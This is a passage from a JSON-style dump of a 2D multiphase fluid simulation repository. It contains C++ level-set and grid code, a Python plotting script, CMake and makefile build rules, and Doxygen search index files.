add_gravity(float dt);\n void advect_velocity(float dt);\n void enforce_boundaries();\n /* Methods specifically used for solving for pressure */\n void solve_pressure(float dt);\n void apply_pressure_gradient(float dt);\n float sample_density(vec2 ij, vec2 kl);\n Eigen::SparseMatrix<double>\n assemble_poisson_coefficient_matrix(Array2i fluid_cell_count, int nf);\n Array2i count_fluid_cells();\n void get_fluid_ids();\n};"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5318265557289124,
"avg_line_length": 28.29729652404785,
"blob_id": "398c0b22b7ba60599bd58ef5f810ad8230481663",
"content_id": "bd8d57bff8d9309a3a155b5911149cb7f6564fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4336,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 148,
"path": "/lib/levelset_methods.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"array2.hpp\"\n#include \"calculus.hpp\"\n#include \"fluid.hpp\"\n#include <glm/gtc/random.hpp>\n\nusing namespace glm;\n\n/** guarantees we will have no overlaps or gaps. Also checks that our fluids are\n * never defined within solid boundaries.\n *\n * currently adding reactions as an experimental feature\n * */\nvoid project_phi(std::vector<Fluid> &fluids, Array2f &solid_phi, vec4 rxn) {\n assert(!fluids.empty());\n int number_grid_points = fluids[0].phi.size();\n for (int i = 0; i < (int)number_grid_points; i++) {\n float min1 = number_grid_points;\n float min2 = number_grid_points;\n int min1_index = -1;\n int min2_index = -1;\n for (int j = 0; j < (int)fluids.size(); j++) {\n auto &f = fluids[j];\n if (f.phi(i) < min1) {\n min2 = min1;\n min2_index = min1_index;\n min1 = f.phi(i);\n min1_index = j;\n } else if (f.phi(i) < min2) {\n min2 = f.phi(i);\n min2_index = j;\n }\n }\n\n assert(min1 != number_grid_points && min2 != number_grid_points);\n assert(min1_index != -1 && min2_index != -1);\n\n bool valid_reaction = (rxn.x >= 0 && rxn.y >= 0 && rxn.z >= 0 && rxn.w > 0);\n bool desired_reactants = ((min1_index == rxn[0] && min2_index == rxn[1]) ||\n (min1_index == rxn[1] && min2_index == rxn[0]));\n bool overlap = (min1 < 0.35f * fluids[min1_index].phi.h &&\n min2 < 0.35f * fluids[min2_index].phi.h);\n if (valid_reaction && desired_reactants && overlap) {\n auto &pf = fluids[rxn[2]];\n pf.phi(i) = min1 - 1.0f * pf.phi.h;\n }\n\n if (min1 * min2 > 0) {\n float avg = (min1 + min2) * 0.5f;\n for (auto &f : fluids) {\n f.phi(i) -= avg;\n }\n }\n }\n}\n\n/** Computes the gradient norm at each point using Godunov's scheme as described\n * in the osher and fedikew book */\nArray2f gradient_norm(Array2f phi, Array2f sigmoid) {\n Array2f gradnorm(phi);\n gradnorm.set(1.0f);\n\n for (auto it = phi.begin(); it != phi.end(); it++) {\n vec2 ij = it.ij();\n if (ij.x < 1 || ij.x >= phi.sx - 1 || ij.y < 1 || ij.y >= phi.sy - 1)\n continue;\n float a = sigmoid(ij);\n float h = phi.h;\n\n float dx = 0;\n float dy = 0;\n\n float dxn = (phi(ij) - phi(ij - vec2(1, 0))) / h;\n float dxp = (phi(ij + vec2(1, 0)) - phi(ij)) / h;\n if (a >= 0) {\n dxn = (dxn > 0) ? dxn * dxn : 0;\n dxp = (dxp < 0) ? dxp * dxp : 0;\n dx = std::max(dxn, dxp);\n } else {\n dxn = (dxn < 0) ? dxn * dxn : 0;\n dxp = (dxp > 0) ? dxp * dxp : 0;\n dx = std::max(dxn, dxp);\n }\n\n float dyn = (phi(ij) - phi(ij - vec2(0, 1))) / h;\n float dyp = (phi(ij + vec2(0, 1)) - phi(ij)) / h;\n if (a >= 0) {\n dyn = (dyn > 0) ? dyn * dyn : 0;\n dyp = (dyp < 0) ? dyp * dyp : 0;\n dy = std::max(dyn, dyp);\n } else {\n dyn = (dyn < 0) ? dyn * dyn : 0;\n dyp = (dyp > 0) ? dyp * dyp : 0;\n dy = std::max(dyn, dyp);\n }\n\n gradnorm(ij) = sqrt(dx + dy);\n }\n return gradnorm;\n}\n\nArray2f compute_sigmoid(Array2f phi) {\n Array2f sigmoid(phi);\n sigmoid.clear();\n for (int i = 0; i < phi.size(); i++) {\n sigmoid(i) = phi(i) / sqrt(pow(phi(i), 2.0f) + pow(phi.h, 2.0f));\n }\n return sigmoid;\n}\n\nvoid reinitialize_phi(Fluid &f) {\n Array2f sigmoid = compute_sigmoid(f.phi);\n Array2f gradnorm = gradient_norm(f.phi, sigmoid);\n\n float err = 0;\n float tol = 1e-1;\n int max_iters = 250;\n float dt = 0.5f * f.phi.h;\n\n for (int iter = 0; iter <= max_iters; iter++) {\n // assert(iter != max_iters);\n // apply the update\n for (int i = 0; i < f.phi.size(); i++) {\n f.phi(i) -= sigmoid(i) * (gradnorm(i) - 1.0f) * dt;\n }\n // check updated error\n gradnorm = gradient_norm(f.phi, sigmoid);\n err = 0;\n for (int i = 0; i < f.phi.size(); i++) {\n err += abs(gradnorm(i) - 1.0f);\n }\n err /= static_cast<float>(f.phi.size());\n if (err < tol)\n break;\n }\n}\n\nvoid advect_phi(Array2f &u, Array2f &v, Array2f &phi, float dt) {\n Array2f new_phi(phi);\n for (auto it = phi.begin(); it != phi.end(); it++) {\n vec2 ij = it.ij();\n vec2 world_position = phi.worldspace_of(ij);\n vec2 velocity(u.value_at(world_position), v.value_at(world_position));\n vec2 del_phi = upwind_gradient(phi, velocity, ij);\n new_phi(ij) = phi(ij) - dt * dot(velocity, del_phi);\n }\n phi = new_phi;\n}\n"
},
{
"alpha_fraction": 0.5879325270652771,
"alphanum_fraction": 0.6033743023872375,
"avg_line_length": 32,
"blob_id": "9be5eec6d015cb5d15c293cb139e4f96b7d27438",
"content_id": "789e194397f0804b23d2c4052c02d3670587c565",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3497,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 106,
"path": "/lib/levelset_constructors.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"fluid.hpp\"\n#include \"json.hpp\"\n#include \"simulation.hpp\"\n#include <glm/gtc/random.hpp>\n#include <string>\n\nusing json = nlohmann::json;\n\n/** \\class FluidConfig\n * A container for a fluid's initial phi conditions.\n * - a string which lets the user choose the shape\n * - three scalar values which describe its transformations\n * - a boolean which negates the phi values\n *\n * supported shapes are: circle, plane */\nstruct FluidConfig {\n std::string name;\n float p1;\n float p2;\n float p3;\n bool negate;\n\n FluidConfig(json j) {\n name = j[\"shape\"].get<std::string>();\n p1 = j[\"property1\"].get<float>();\n p2 = j[\"property2\"].get<float>();\n p3 = j[\"property3\"].get<float>();\n negate = j[\"negate\"].get<bool>();\n assert(name == \"circle\" || name == \"plane\" ||\n name == \"none\"); // TODO replace with enum types\n };\n\n void print_information() {\n printf(\"name: %s\\np1: %f, p2: %f, p3: %f\\n negate: %s\\n\", name.c_str(), p1,\n p2, p3, negate ? \"true\" : \"false\");\n }\n};\n\n/* x1, x2 is a position in space (scaled from 0-1)\n * p1, p2 are the spheres center\n * p3 is the radius\n */\nfloat compute_phi_sphere(vec2 p, FluidConfig &fconf) {\n return distance(p, vec2(fconf.p1, fconf.p2)) - fconf.p3;\n}\n\n/* returns the distance a point is ABOVE a plane.\n * p1 is the planes height (lower)\n * p2 is the planes height (upper)\n * p3 is the jitter quantity\n */\nfloat compute_phi_plane(vec2 p, FluidConfig &fconf) {\n float midpoint = (fconf.p1 + fconf.p2) * 0.5f;\n float radius = (fconf.p1 - fconf.p2) * 0.5f;\n return abs(p.y - (midpoint + linearRand(-fconf.p3, fconf.p3))) - radius;\n}\n\n/** TODO - add documentation and more level set starting configurations */\nvoid construct_levelset(Fluid &f, int sx, int sy, float h, std::string name,\n std::vector<FluidConfig> fluid_phis) {\n f.phi.set((sx + sy) * h);\n\n for (auto it = f.phi.begin(); it != f.phi.end(); it++) {\n vec2 ij = it.ij();\n vec2 scaled_position =\n vec2((static_cast<float>(ij.x) + 0.5f) / static_cast<float>(sx),\n (static_cast<float>(ij.y) + 0.5f) / static_cast<float>(sy));\n float phi_value = 0;\n\n for (auto fconf : fluid_phis) {\n if (fconf.name == \"circle\") {\n phi_value = compute_phi_sphere(scaled_position, fconf);\n } else if (fconf.name == \"plane\") {\n phi_value = compute_phi_plane(scaled_position, fconf);\n } else if (fconf.name == \"none\") {\n phi_value = fconf.negate ? -(f.phi.sx + f.phi.sy) * h\n : (f.phi.sx + f.phi.sy) * h;\n }\n phi_value = fconf.negate ? -phi_value : phi_value;\n f.phi(ij) = min(phi_value, f.phi(ij));\n }\n }\n}\n\n/** returns the distance from a point to a bounding box */\nfloat distance_to_bounds(vec2 position, vec2 lower_bounds, vec2 upper_bounds) {\n float dx =\n min(abs(lower_bounds.x - position.x), abs(position.x - upper_bounds.x));\n float dy =\n min(abs(lower_bounds.y - position.y), abs(position.y - upper_bounds.y));\n return sqrt(dx * dx + dy * dy);\n}\n\n/** Sets the phi value at any point to be no more than the negative distance to\n * the nearest wall */\nvoid fix_levelset_walls(std::vector<Fluid> &fluids, vec2 lower_bounds,\n vec2 upper_bounds) {\n for (auto &f : fluids) {\n for (auto it = f.phi.begin(); it != f.phi.end(); it++) {\n float box_distance =\n distance_to_bounds(it.wp(), lower_bounds, upper_bounds);\n *it = max(-box_distance, *it);\n }\n }\n}"
},
{
"alpha_fraction": 0.4734693765640259,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 39.83333206176758,
"blob_id": "adfc8823c229a53db6e474b125c2da81f60acca3",
"content_id": "0fc6a38efac10cf98ea735ed4cde5ce3205e801e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 245,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 6,
"path": "/docs/search/classes_0.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['array2',['Array2',['../structArray2.html',1,'']]],\n ['array2_3c_20float_20_3e',['Array2< float >',['../structArray2.html',1,'']]],\n ['array2_3c_20int_20_3e',['Array2< int >',['../structArray2.html',1,'']]]\n];\n"
},
{
"alpha_fraction": 0.7113164067268372,
"alphanum_fraction": 0.7113164067268372,
"avg_line_length": 32.30769348144531,
"blob_id": "59fee610fc00efff3351e0f51c17926a79dcfa5a",
"content_id": "c2b122a3c7a90884216ae10c3246bdbe295fd75b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 13,
"path": "/src/CMakeLists.txt",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "aux_source_directory(${CMAKE_CURRENT_LIST_DIR} src)\nadd_executable(${PROJECT_NAME} ${src})\n\ntarget_link_libraries(${PROJECT_NAME} ${PROJECT_NAME}lib)\ninclude_directories(${PROJECT_ROOT}/lib)\ninclude_directories(${PROJECT_ROOT}/thirdparty/nlohmann_json)\n\nget_property(dirs\n DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}\n PROPERTY INCLUDE_DIRECTORIES)\nforeach(dir ${dirs})\n message(STATUS \"dir='${dir}'\")\nendforeach()\n"
},
{
"alpha_fraction": 0.5995085835456848,
"alphanum_fraction": 0.6122850179672241,
"avg_line_length": 29.388059616088867,
"blob_id": "93e352362f0d06cbbef6700b4113ce0e3e6463e6",
"content_id": "2a655dcd0331023a60205cdc515a10db8113f886",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2035,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 67,
"path": "/lib/settings.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n/** \\file Loads data from config.json and returns\n parameters for initializing the simulation.\n*/\n\n#include \"json.hpp\"\n#include \"levelset_constructors.hpp\"\n#include \"simulation.hpp\"\n#include <fstream>\n#include <iostream>\n#include <string>\n\n// for convenience\nusing json = nlohmann::json;\n\nvoid initialize_boundaries(Simulation &sim) {\n sim.solid_phi.set(0.5f * sim.solid_phi.h);\n for (int i = 0; i < sim.sx; i++) {\n sim.solid_phi(i, 0) = -0.5;\n sim.solid_phi(i, sim.sy - 1) = -0.5;\n }\n for (int j = 0; j < sim.sy; j++) {\n sim.solid_phi(0, j) = -0.5;\n sim.solid_phi(sim.sx - 1, j) = -0.5;\n }\n}\n\n/** Initializes a simulation based on the json parameters,\n * then adds fluids and sets their starting phis.\n */\nvoid initialize_simulation(Simulation &sim) {\n std::ifstream i(\"config.json\");\n json j;\n i >> j;\n\n int sx = j[\"horizontal_cells\"].get<int>();\n int sy = j[\"vertical_cells\"].get<int>();\n float h = j[\"cell_size\"].get<float>();\n float rt = j[\"runtime\"].get<float>();\n float dt = j[\"timestep\"].get<float>();\n\n // define the computational domain\n sim.init(sx, sy, h, rt, dt);\n\n // load the reactions TODO handle multiple\n auto rxn_json = j[\"reaction\"].get<json>();\n sim.rxn =\n vec4(rxn_json[\"reactant1\"].get<int>() - 1,\n rxn_json[\"reactant2\"].get<int>() - 1,\n rxn_json[\"product\"].get<int>() - 1, rxn_json[\"rate\"].get<float>());\n\n // add each fluid\n for (auto tmp : j[\"fluids\"].get<json>()) {\n sim.add_fluid(tmp[\"density\"].get<float>());\n std::string fluid_name = tmp[\"name\"].get<std::string>();\n std::printf(\"~~ adding %s...\\n\", fluid_name.c_str());\n // then initialize phi\n std::vector<FluidConfig> fluid_phis;\n for (auto p : tmp[\"phi\"].get<json>()) {\n fluid_phis.push_back(FluidConfig(p.get<json>()));\n fluid_phis.back().print_information();\n }\n construct_levelset(sim.fluids.back(), sx, sy, h, fluid_name, fluid_phis);\n }\n initialize_boundaries(sim);\n fix_levelset_walls(sim.fluids, vec2(0, 0), vec2(sx * h, sy * h));\n}"
},
{
"alpha_fraction": 0.520302414894104,
"alphanum_fraction": 0.5365443825721741,
"avg_line_length": 27.12598419189453,
"blob_id": "ca25e47f164d3e9c5c27acb5678ef9f7b337c3e7",
"content_id": "a2b6745c38c3187fdef5303954d131040590d12b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3571,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 127,
"path": "/plot/movie.py",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib\nfrom matplotlib.colors import Normalize\nimport matplotlib.cm as cm\nfrom scipy.interpolate import griddata\nimport json\nfrom tqdm import tqdm\n\nphi_location = \"plot/data/phi.txt\"\nvelocity_location = \"plot/data/vel.txt\"\n\n\ndef read_blocks(input_file, i, j):\n \"\"\" Split a data file by newlines/comments. this is used to split our datafile by time\n indexing begins at 0.\"\"\"\n empty_lines = 0\n blocks = []\n for line in open(input_file):\n # Check for empty/commented lines\n if not line or line.startswith('#'):\n # If 1st one: new block\n if empty_lines == 0:\n blocks.append([])\n empty_lines += 1\n # Non empty line: add line in current(last) block\n else:\n empty_lines = 0\n blocks[-1].append(line)\n return blocks[i:j + 1]\n\n\nwith open('config.json') as config_file:\n data = json.load(config_file)\n\nxmax = data['horizontal_cells'] * data['cell_size']\nymax = data['vertical_cells'] * data['cell_size']\nh_cells = data['horizontal_cells']\nv_cells = data['vertical_cells']\nnumber_of_fluids = len(data['fluids'])\n\nphi_datablocks = read_blocks(phi_location, 0, 1000)\nvel_datablocks = read_blocks(velocity_location, 0, 1000)\n\nfor frame in tqdm(range(0, len(phi_datablocks))):\n phi_datablock = phi_datablocks[frame]\n vel_datablock = vel_datablocks[frame]\n\n\n #--------------------------------\n # fluid types\n #--------------------------------\n x, y, z, fluid_id, pressure = np.loadtxt(phi_datablock, unpack=True)\n xi = np.linspace(0.0, xmax, 2 * h_cells)\n yi = np.linspace(0.0, ymax, 2 * v_cells)\n xi, yi = np.meshgrid(xi, yi)\n zi = griddata((x, y), fluid_id, (xi, yi), method='linear')\n\n fig = matplotlib.pyplot.gcf()\n fig.set_size_inches(10,10)\n\n plt.imshow(\n zi,\n origin='lower',\n cmap=cm.Pastel2,\n interpolation='bilinear',\n extent=[\n np.min(x),\n np.max(x),\n np.min(y),\n np.max(y)],\n vmin=0,\n vmax=number_of_fluids\n )\n\n #--------------------------------\n # phi value contour lines\n #--------------------------------\n # boundaryi = griddata((x, y), z, (xi, yi), method='nearest')\n # contour = contour(\n # xi,\n # yi,\n # boundaryi,\n # levels=8,\n # linewidths=1,\n # cmap=cm.RdBu)\n\n #--------------------------------\n # velocity field quiver\n #--------------------------------\n x, y, u, v = np.loadtxt(vel_datablock, unpack=True)\n xii = np.linspace(0.0, xmax, h_cells // 4)\n yii = np.linspace(0.0, ymax, v_cells // 4)\n xii, yii = np.meshgrid(xii, yii)\n ui = griddata((x, y), u, (xii, yii), method='linear')\n vi = griddata((x, y), v, (xii, yii), method='linear')\n\n # plt.set_xlim(0, xmax)\n # plt.set_ylim(0, ymax)\n # plt.set_title(\"t=\" + str(frame))\n # plt.set_aspect(\"equal\")\n plt.axis('off')\n plt.quiver(\n xii,\n yii,\n ui,\n vi,\n np.sqrt(\n ui**2 +\n vi**2),\n angles='xy',\n scale_units='xy',\n scale=10,\n width=0.0015,\n headwidth=2,\n # headlength=1,\n pivot='mid')\n\n # plt.set_title(\"t=\" + str(frame))\n # plt.set_aspect(\"equal\")\n # plt.axis('off')\n\n plt.tight_layout()\n plt.savefig('plot/images/phi{0:05d}.png'.format(frame), bbox_inches='tight')\n plt.clf()\n # print('frame saved to plot/images/phi{0:05d}.png'.format(frame))"
},
{
"alpha_fraction": 0.6148648858070374,
"alphanum_fraction": 0.7567567825317383,
"avg_line_length": 36,
"blob_id": "fe0c79ddc842de6c6a463c680a9cf68476a845f6",
"content_id": "e811557216b67e0785adf0ccbaa658f24d7997ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 148,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 4,
"path": "/docs/search/all_2.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['enforce_5fboundaries',['enforce_boundaries',['../classSimulation.html#a616b2ffd9f07cf8e2ee377fa313e5607',1,'Simulation']]]\n];\n"
},
{
"alpha_fraction": 0.5789074301719666,
"alphanum_fraction": 0.5910470485687256,
"avg_line_length": 27.06382942199707,
"blob_id": "6d1b22b17a0217f7710204d2f9f223be90a32931",
"content_id": "69d949b6db9a7919d19207a8aae98bcbeb9ec8a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1318,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 47,
"path": "/lib/fluid.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"array2.hpp\"\n#include <algorithm>\n#include <stdio.h>\n\n/** \\class Particle\n * A simple particle class for use in the particle level set method\n */\nclass Particle {\npublic:\n vec2 position;\n float starting_phi;\n float radius;\n bool valid;\n\n Particle(vec2 position_, float starting_phi_, float radius_)\n : position(position_), starting_phi(starting_phi_), radius(radius_) {\n valid = true;\n }\n};\n\n/** \\class Fluid\n * each fluid has its own velocity, pressure, and level set which are\n * then composed by way of \"ghost values\"\n */\nclass Fluid {\npublic:\n float density;\n Array2f phi; // phi, sampled at center\n Array2i particle_count; // counts how many particles are in that area, sampled\n // in the same manner as pls_phi\n\n std::vector<Particle> particles;\n\n Fluid(float density_, int sx_, int sy_, float h) : density(density_) {\n phi.init(sx_, sy_, -0.5, -0.5, h);\n particle_count.init(sx_, sy_, 0.f, 0.f, h);\n }\n /* */\n void print_information() {\n printf(\"~~ Fluid information ~~\\n density: %.3f\\n volume: ~%i%%\\n\", density,\n (int)(100.f *\n (float)count_if(phi.data.begin(), phi.data.end(),\n [](float f) { return f < 0.f; }) /\n (float)phi.size()));\n }\n};"
},
{
"alpha_fraction": 0.701197624206543,
"alphanum_fraction": 0.7095808386802673,
"avg_line_length": 25.5238094329834,
"blob_id": "38318718cfdba91109b8e2d5ebbda79bfbd70963",
"content_id": "2414cf515ef45bf061ae9dbc42036b2c57408097",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1670,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 63,
"path": "/makefile",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "default: build\n\n.PHONY: build\nbuild:\n\trm -rf build/CMakeFiles/gfm.dir\n\t-[[ -f config.json ]] || cp assets/config.json.orig config.json\n\t-[[ -d build ]] || mkdir build\n\tcd build; cmake ..; make -j8\n\n.PHONY: format\nformat:\n\tfind ./lib ./src ./test -iname *.hpp -o -iname *.cpp \\\n\t| xargs clang-format -i\n\tcmake-format -i --command-case canonical --keyword-case upper \\\n\t--enable-sort True --autosort True --enable-markup True \\\n\t./CMakeLists.txt ./src/CMakeLists.txt ./lib/CMakeLists.txt ./test/CMakeLists.txt\n\tautopep8 --in-place --aggressive --aggressive plot/plot.py\n\tpython -m json.tool assets/config.json.orig assets/tmp.json\n\tmv -f assets/tmp.json assets/config.json.orig\n\tpython -m json.tool config.json tmp.json\n\tmv -f tmp.json config.json\n\n.PHONY: clean\nclean:\n\trm -f plot/data/*\n\trm -f plot/images/*\n\trm -rf build/\n\trm -f ./*.gcov\n\trm -f capture.info\n\n.PHONY: run\nrun:\n\tbuild/bin/gfm \n\n.PHONY: test\ntest:\n\tbuild/bin/gfm_test\n\n.PHONY: docs\ndocs:\n\trm -rf docs/ && doxygen .doxyfile\n\n.PHONY: draw\ndraw:\n\tpython plot/plot.py\n\n.PHONY: movie\nmovie:\n\tpython plot/movie.py\n\tffmpeg -r 30 -i plot/images/phi%05d.png -c:v libvpx-vp9 -crf 30 -b:v 0 -y -an video.webm -vf \"pad=ceil(iw/2)*2:ceil(ih/2)*2\"\n\tmpv video.webm\n\n.PHONY: all\nall: clean format build test\n\n#note - this depends on using clang, added this just for testing on the macbook\n.PHONY: profile\nprofile: format clean build\n\tLLVM_PROFILE_FILE=\"code-%p.profraw\" build/bin/gfm\n\tcp -f examples/dam_break.json config.json\n\tLLVM_PROFILE_FILE=\"code-%p.profraw\" build/bin/gfm\n\tllvm-profdata merge -output=code.profdata code-*.profraw\n\tllvm-cov show -format=html -instr-profile code.profdata build/bin/gfm > report.html"
},
{
"alpha_fraction": 0.6327160596847534,
"alphanum_fraction": 0.6574074029922485,
"avg_line_length": 24,
"blob_id": "25514a1947c36d19366d776c9e23091c2f205ccc",
"content_id": "ec8b61fdb6b833749066b3afd55f830b3521300d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 13,
"path": "/lib/velocityfield.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"array2.hpp\"\n#include <glm/glm.hpp>\n\nstruct VelocityField {\n Array2f *up;\n Array2f *vp;\n VelocityField() {}\n VelocityField(Array2f *u_, Array2f *v_) : up(u_), vp(v_) {}\n vec2 operator()(glm::vec2 world_position) {\n return vec2(up->value_at(world_position), vp->value_at(world_position));\n }\n};"
},
{
"alpha_fraction": 0.5710327625274658,
"alphanum_fraction": 0.5927351117134094,
"avg_line_length": 29.078702926635742,
"blob_id": "a8f7e445a836ce6a68da8ff736021c0de4e3536e",
"content_id": "9ce1be2579b796f4849840a2e85b5a20f185a9b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6497,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 216,
"path": "/lib/array2.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n\n#include <algorithm>\n#include <glm/glm.hpp>\n#include <vector>\n\nusing namespace glm;\n\n/** \\class Array2\n * A 2d array template with a consistent\n * spatial indexing scheme for use in a collocated\n * grid. For translation between worldspace and gridspace,\n * we use a linear offset. The leastmost worldspace coordinate considered in our\n * universe is (0,0)\n */\ntemplate <class T> struct Array2 {\npublic:\n int sx = 0;\n int sy = 0;\n float offset_x = 0;\n float offset_y = 0;\n float h = 0;\n std::vector<T> data;\n\n /** \\class Array2::iterator\n * iterates through our data vecot\n * call ij() on the iterate to get the index\n */\n class iterator : public std::vector<T>::iterator {\n public:\n Array2<T> const *owner;\n iterator(Array2<T> const *owner, typename std::vector<T>::iterator iter)\n : std::vector<T>::iterator(iter), owner(owner) {}\n using std::vector<T>::iterator::operator++;\n vec2 ij() { return owner->ij_from_index(*this - owner->data.begin()); }\n vec2 wp() { return owner->wp_from_index(*this - owner->data.begin()); }\n };\n iterator begin() { return iterator(this, data.begin()); }\n iterator end() { return iterator(this, data.end()); }\n\n int size() const { return sx * sy; }\n\n /** An empty contructor not intended to be used */\n Array2() {}\n\n /** Equip the grid with dimensions as well as an \"offset\" to foolproof\n * converting from worldspace to gridspace and back */\n Array2(int sx_, int sy_, float offset_x_, float offset_y_, float h_)\n : sx(sx_), sy(sy_), offset_x(offset_x_), offset_y(offset_y_), h(h_) {\n init();\n }\n\n void init(int sx_, int sy_, float offset_x_, float offset_y_, float h_) {\n sx = sx_;\n sy = sy_;\n offset_x = offset_x_;\n offset_y = offset_y_;\n h = h_;\n init();\n }\n\n /** FIXME creating new vectors might be causing memory leaks on resets\n * Creates a vector to store the grid's elements and clears every value to 0*/\n void init() {\n assert(sx != 0 && sy != 0);\n assert(h != 0);\n data = std::vector<T>(sx * sy);\n clear();\n }\n\n /** Fills the data vector with the input value */\n void set(T val) { std::fill(data.begin(), data.end(), val); }\n\n void clamp(T min, T max) {\n for (auto &d : data) {\n d = glm::clamp(d, min, max);\n }\n }\n\n /** Fills the data vector with 0 casted to the template type */\n void clear() { set(static_cast<T>(0)); }\n\n /** returns direct access to the data vector */\n T &operator()(int i) {\n assert(i >= 0 && i <= sx * sy);\n return data[i];\n }\n\n /** Takes in x and y indice of the grid and returns the value stored at that\n * index. */\n T &operator()(int i, int j) {\n // TODO make sure nothing accesses this incorrectly\n i = i < 0 ? 0 : i;\n i = i > sx - 1 ? sx - 1 : i;\n j = j < 0 ? 0 : j;\n j = j > sy - 1 ? sy - 1 : j;\n assert(i >= 0 && i < sx);\n assert(j >= 0 && j < sy);\n return data[i + (sx * j)];\n }\n\n /** Takes in a vec2 index of the grid and returns the value stored at that\n * index. Note: this .can. beused with any position in grid coordinates */\n T &operator()(glm::vec2 const ij) { return (*this)(ij.x, ij.y); }\n\n /** Takes in some position in world coordinates and returns the *grid*\n * coordinates of that position. An example translation is that a\n * center-sampled (eg pressure) value would have offsets -0.5,-0.5 */\n vec2 coordinates_at(vec2 world_coordinates) {\n assert(!std::isnan(world_coordinates.x) &&\n !std::isnan(world_coordinates.y));\n assert(h != 0);\n float i = (world_coordinates.x / h) + offset_x;\n float j = (world_coordinates.y / h) + offset_y;\n if (i < 0)\n i = 0;\n if (j < 0)\n j = 0;\n if (i > sx - 1)\n i = sx - 1;\n if (j > sy - 1)\n j = sy - 1;\n assert(!std::isnan(i) && !std::isnan(j));\n return vec2(i, j);\n }\n\n /** Takes in grid coordinates (eg an index) and returns the worldspace\n * position */\n vec2 worldspace_of(vec2 grid_coordinates) const {\n assert(grid_coordinates.x >= 0 && grid_coordinates.x <= sx - 1);\n assert(grid_coordinates.y >= 0 && grid_coordinates.y <= sy - 1);\n return vec2((grid_coordinates.x - offset_x) * h,\n (grid_coordinates.y - offset_y) * h);\n }\n\n /** converts from a scalar index (indexing the data vector) to a vec2\n * with x and y coordinates */\n vec2 ij_from_index(int index) const {\n assert(index >= 0 && index < sx * sy);\n vec2 ij = vec2(index % sx, index / sx);\n assert(ij.x + (sx * ij.y) == index); // convert back\n return ij;\n }\n\n vec2 wp_from_index(int index) const {\n return worldspace_of(ij_from_index(index));\n }\n\n // TODO rearrange this code\n T max() { return *std::max_element(data.begin(), data.end()); }\n T min() { return *std::min_element(data.begin(), data.end()); }\n T infnorm() {\n T best_val = 0;\n for (auto &d : data) {\n if (std::abs(d) > best_val)\n best_val = std::abs(d);\n }\n return best_val;\n }\n\n inline T lerp(T val1, T val2, float f) {\n return (1.0f - f) * val1 + f * val2;\n }\n\n inline T lerp_2(T val00, T val10, T val01, T val11, vec2 f) {\n return lerp(lerp(val00, val10, f.x), lerp(val01, val11, f.x), f.y);\n }\n\n inline int index_from_ij(vec2 ij) { return ij.x + (sx * ij.y); }\n\n /** The same as (vec2) but it does not interpolate\n * deprecated but i like having it. Note: this forces the coordinates inbound\n */\n T snapped_access(vec2 ij) {\n ivec2 rounded(ij);\n int i = rounded.x;\n int j = rounded.y;\n if (i < 0)\n i = 0;\n if (j < 0)\n j = 0;\n if (i > sx - 1)\n i = sx - 1;\n if (j > sy - 1)\n j = sy - 1;\n int index = i + (sx * j);\n assert(index >= 0);\n assert(index < sx * sy);\n return data[index];\n }\n\n vec2 subcell_coordinates(vec2 ij) {\n ivec2 rounded(ij);\n return ij - vec2(rounded);\n }\n\n /* bilerp takes in a location (in grid coordinates) and returns the\n * interpolated value at the coordinate*/\n T const bilerp(vec2 ij) {\n assert(!std::isnan(ij.x) &&\n !std::isnan(ij.y)); // added in the debugging process\n T val00 = snapped_access(ij);\n T val10 = snapped_access(ij + vec2(1, 0));\n T val01 = snapped_access(ij + vec2(0, 1));\n T val11 = snapped_access(ij + vec2(1, 1));\n return lerp_2(val00, val10, val01, val11, subcell_coordinates(ij));\n }\n\n T value_at(vec2 world_position) {\n return bilerp(coordinates_at(world_position));\n 